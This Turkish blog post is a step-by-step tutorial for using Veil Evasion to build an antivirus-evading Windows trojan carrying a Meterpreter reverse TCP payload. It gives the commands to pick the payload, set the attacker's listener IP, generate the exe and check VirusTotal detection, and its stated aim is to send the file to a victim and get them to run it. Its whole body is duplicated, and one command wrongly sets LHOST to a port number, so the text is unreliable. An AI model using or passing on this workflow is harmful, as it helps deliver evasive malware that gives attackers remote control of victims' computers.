Kendi Sıfırgün (Zeroday) Truva Atımızı Oluşturma 2 - Veil üzerinden Truva atımızı oluşturma
Bir önceki yazımızda Veil kurulumunu gördük. Bu yazımızda Veil üzerinden antivirüslere yakalanmayacak truva atımızı oluşturuyoruz. Temel senaryomuz kurbana truva atını göndermek, indirmesini ve çalıştırmasını sağlamak.
Daha önceki yazımızda Veil'i "/root/Veil" dizinine kurmuştuk. bu dizin içinden terminali kullanarak aşağıdaki komut ile Veil'i çalışıtıyoruz.
# ./Veil.py
Veil içinde kullanacağımız araç "Evasion". Aşağıdaki komut ile "Evasion'a" geçiyoruz.
# use Evasion
Bundan sonra saldırıda kullanacağımız paketlerin bir listesine "list" komutu ile bakıyoruz.
# list
Bizim kullanacağımız 28 numara: Meterpreter reverse TCP. Bu payload karşı tarafta bir Meterpreter Shell açıp bizim bilgisayarımıza bağlanacak ve komut bekleyecek. Meterpreter hedefi ele geçirdikten sonra: bilgi toplama, başka bilgisayarlara yayılma, kalıcı hale gelme, ortam izleme ve dinleme gibi birçok hazır özelliği üzerinde barındırıyor. Aşağıdaki komut ile ile ilerliyoruz.
# use 28
Karşımıza mevcut opsiyonların bir listesi gelecek. Dolduracağımız en önemli iki parametre: LHOST yani sunucu bilgisayarımızın IP'si. Kurbanlar bu IP'ye bağlanacaklar. LPORT ise sunucumuzdaki hangi porta bağlanacakları.
# set LHOST 192.168.1.28
# set LHOST 8888
# options
sonraki komutumuz "generate" bu komut ile trojanımız ve sunucuda kullanacağımız komut dosyamız oluşacak.
# generate
Devamında bizden dosya ismi isteyecek. Ben örnekte "sampletrojan" olarak bir isim girdim. Bundan sonra exe oluşturmak için kullanacağı yöntemi soruyor. Yöntem olarak "1 - Pyinstaller" seçiyoruz. İşlem bittikten sonra "Virustotal'de hash karşılığı var mı?" diye aşağıdaki komut ile kontrol edebiliriz.
# checkvt
Ayrıca bu işlemler ile ilgili videoyu aşağıya ekledim.
Daha önceki yazımızda Veil'i "/root/Veil" dizinine kurmuştuk. bu dizin içinden terminali kullanarak aşağıdaki komut ile Veil'i çalışıtıyoruz.
# ./Veil.py
Veil içinde kullanacağımız araç "Evasion". Aşağıdaki komut ile "Evasion'a" geçiyoruz.
# use Evasion
Bundan sonra saldırıda kullanacağımız paketlerin bir listesine "list" komutu ile bakıyoruz.
# list
Bizim kullanacağımız 28 numara: Meterpreter reverse TCP. Bu payload karşı tarafta bir Meterpreter Shell açıp bizim bilgisayarımıza bağlanacak ve komut bekleyecek. Meterpreter hedefi ele geçirdikten sonra: bilgi toplama, başka bilgisayarlara yayılma, kalıcı hale gelme, ortam izleme ve dinleme gibi birçok hazır özelliği üzerinde barındırıyor. Aşağıdaki komut ile ile ilerliyoruz.
# use 28
Karşımıza mevcut opsiyonların bir listesi gelecek. Dolduracağımız en önemli iki parametre: LHOST yani sunucu bilgisayarımızın IP'si. Kurbanlar bu IP'ye bağlanacaklar. LPORT ise sunucumuzdaki hangi porta bağlanacakları.
# set LHOST 192.168.1.28
# set LHOST 8888
# options
sonraki komutumuz "generate" bu komut ile trojanımız ve sunucuda kullanacağımız komut dosyamız oluşacak.
# generate
Devamında bizden dosya ismi isteyecek. Ben örnekte "sampletrojan" olarak bir isim girdim. Bundan sonra exe oluşturmak için kullanacağı yöntemi soruyor. Yöntem olarak "1 - Pyinstaller" seçiyoruz. İşlem bittikten sonra "Virustotal'de hash karşılığı var mı?" diye aşağıdaki komut ile kontrol edebiliriz.
# checkvt
Ayrıca bu işlemler ile ilgili videoyu aşağıya ekledim.
Yorumlar
Yorum Gönder